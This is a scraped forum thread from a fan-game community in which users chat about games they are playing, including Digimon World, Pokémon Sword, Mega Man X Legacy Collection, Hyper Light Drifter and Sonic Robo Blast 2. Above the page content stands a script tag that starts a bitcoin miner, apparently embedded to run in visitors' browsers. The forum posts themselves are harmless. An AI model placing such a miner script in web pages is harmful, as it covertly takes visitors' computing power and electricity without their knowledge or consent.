<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Re: What games are you playing?

Postby KobaBeach » 6 days ago

The Hero Hartmut wrote: I was able to get a legitimate Ultimate-level Digivolution on my first partner: Agumon -> Centarumon -> Andromon. Wasn't expecting to actually do it. I even got Angemon to the city much earlier than usual as a result.
That's awesome, good job!!!!!!!!!

I once got Andromon (second partner, Punimon -> Tsunomon -> Elecmon -> Leomon -> Andromon) through battling a lot iirc, maybe that's what you did. There's only so much you can do to pass the time in this game.

Condolences on the right thumb though.
twitter (spicy at times!) | avatar by kuma

who cares:

The Hero Hartmut
First name: Garreth

Postby The Hero Hartmut » 6 days ago

It happened after I fed him, so I believe I'd just gotten close enough to the target weight and stat requirements, as well as having fewer than five care mistakes, to satisfy the Digivolution parameters. I don't recall having gotten into that many battles. A shame I'm not in a position for him to learn some of the machine techniques (which are mostly based in Factorial Town fights), though getting Megaton Punch is certainly a nice boon.

You really do need to know what you're doing to make any kind of progress with this game.

Arrietty

Postby Arrietty » 6 days ago

Bean wrote: I beat Let's Go Pikachu! the other night, so there's the first ever game in that series taken care of after twenty years of it being around.
Congrats! I remember you telling me yeaaars ago that you've never played much of a Pokemon game before. What did you think of LGPE? :D

Bean

Postby Bean » 6 days ago

Arrietty wrote: Congrats! I remember you telling me yeaaars ago that you've never played much of a Pokemon game before. What did you think of LGPE? :D
It was fine. I know it's not the traditional deal of whittling a wild one down to then catch it, but maybe it was for the best that it was faster for a first attempt since 1-on-1 RPGs are usually not my thing. The only thing I didn't like about it was how it felt like catches were just pure luck. I could get three Excellent ratings in a row only to catch it on a halfhearted Nice attempt.

It was fun, unlike Mega Man X5 which I am now replaying on the MMX Legacy Collection 2 to finally finish that game off. Way too much text and forced gameplay breaks in that one for me to ever like it. Even X6 knew not to do that.

Slimeman01
Elecman D A B B B
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 5 days ago

I recently beat Pokemon Sword, and I think this may be one of my favourites (Nothing'll beat Gen 5 though, hehehe). Everything about it is so strong, from the story, to the atmosphere, to the lore, I love it all. Also raids are so fun, I've been doing them quite frequently! (Thanks FusionWarrior for finding so many raids, your mew has carried them many times!)
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

11clock

Postby 11clock » 4 days ago

I have now officially done a full month of Ring Fit Adventure. My weight isn’t much lower, but I do feel better overall and my sleep has improved tremendously. I have also been able to increase my exercise time from 10 minutes to nearly 25 minutes. The original 10 minutes feels like barely anything now.

NastCF

Postby NastCF » 4 days ago

Finished Hyper Light Drifter. Pretty sure I got everything there is to get in a normal game. I might try New Game+ and New Game Alt at some point.

What a neat little game. Fantastic presentation and ambience, with some seriously memorable visual setpieces. Generally more linear than I expected, but with a pretty appealing approach to exploration, where you are encouraged to look for secrets through observation rather than obsessively running into walls or jumping down random holes. The combat's fast-paced and becomes more dynamic the more abilities you unlock, while remaining very simple at its core. The level design is pretty consistent, sometimes to a fault, but certain nuances give each region its own unique feel, along with enemy selection and unique mechanics. Not many super memorable or creative gameplay setups, but by no means unfun or badly designed. The lack of information and dialogue is fascinating as I've said before, managing to make me feel alienated and immersed at the same time - that said, the entirety of the story went completely over my head. Overall it ticks all the right boxes for a super solid Metroidvania, imo.

Bean

Postby Bean » 4 days ago

Finally went through and finished off the Mega Man X Legacy Collection 1+2. X5 was the last game on the list, and it's still the worst of the main eight to me just for being such a poor follow-up to MMX4. X6 is worse when comparing the two, but at least that one knows it's a bad game. I will say that they did fix one of my biggest gripes in the game though by making it easier to jump out of the Ride Armor in the lava level to get that one capsule, so that and the better translation makes it the definitive version of a mediocre Mega Man.

4 > 2 > 1 > 8 > 3 > 7 > 6 > 5

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: You played a video game? Do those even exist?

Postby Awoo » 3 days ago

Bean wrote: Finally went through and finished off the Mega Man X Legacy Collection 1+2. X5 was the last game on the list, and it's still the worst of the main eight to me just for being such a poor follow-up to MMX4. X6 is worse when comparing the two, but at least that one knows it's a bad game. I will say that they did fix one of my biggest gripes in the game though by making it easier to jump out of the Ride Armor in the lava level to get that one capsule, so that and the better translation makes it the definitive version of a mediocre Mega Man.

4 > 2 > 1 > 8 > 3 > 7 > 6 > 5
5 and 6 just needed more

energy vinegar

ワンワン :pal:

Slimeman01
Elecman D A B B B
First name: Matt

Postby Slimeman01 » 1 day ago

I've been trying to hatch myself a shiny Mimiyku in Pokemon Sword, I'm currently around 450 eggs in and no sign of the shiny yet. Hopefully Masuda will be in my favour though!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

NastCF

Postby NastCF » 9 hours ago

I had a go at Sonic Robo Blast 2 which I haven't played in years. It recently had a massive update and I've heard a lot of praise for it.

Admittedly first impressions weren't very good. Setting up gamepad controls was a huge hassle, and even then actually controlling Sonic felt very awkward at the start. I did get accostumed to it eventually though and I started appreciating the game a lot more. The level design's open enough without lacking a sense of direction, it has that spirit of the 2D games where you could go multiple runs through a stage and have a totally different experience due to all the different paths you can take. There's some pretty neat level mechanics too. Unfortunately I had to stop due to a sudden bout of motion sickness :ehh: But I'm curious to see the rest of the game.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 4 hours ago

NastCF wrote: I had a go at Sonic Robo Blast 2 which I haven't played in years. It recently had a massive update and I've heard a lot of praise for it.
I actually tried it out and played to Techno Hill 2. The way the thok, camera and characters all control now are mad jank but I'm still getting used to it. Changed the jump and spin buttons from keyboard keys to mouse clicks so it's less awkward on my hands. Got two emeralds, probably won't get all of them.

Started Wild ARMs again last night just to check out the Japanese version. Thinking of going through the game like this and studying the dialogue for vocab. Not expecting Yasunari Kawabata out of this (btw i should read like Snow Country or smth to start getting into books, JRPGs are ruining my sense of taste) but anything's better than Pokémon text.
twitter (spicy at times!) | avatar by kuma

who cares:

Return to “the cartridgé”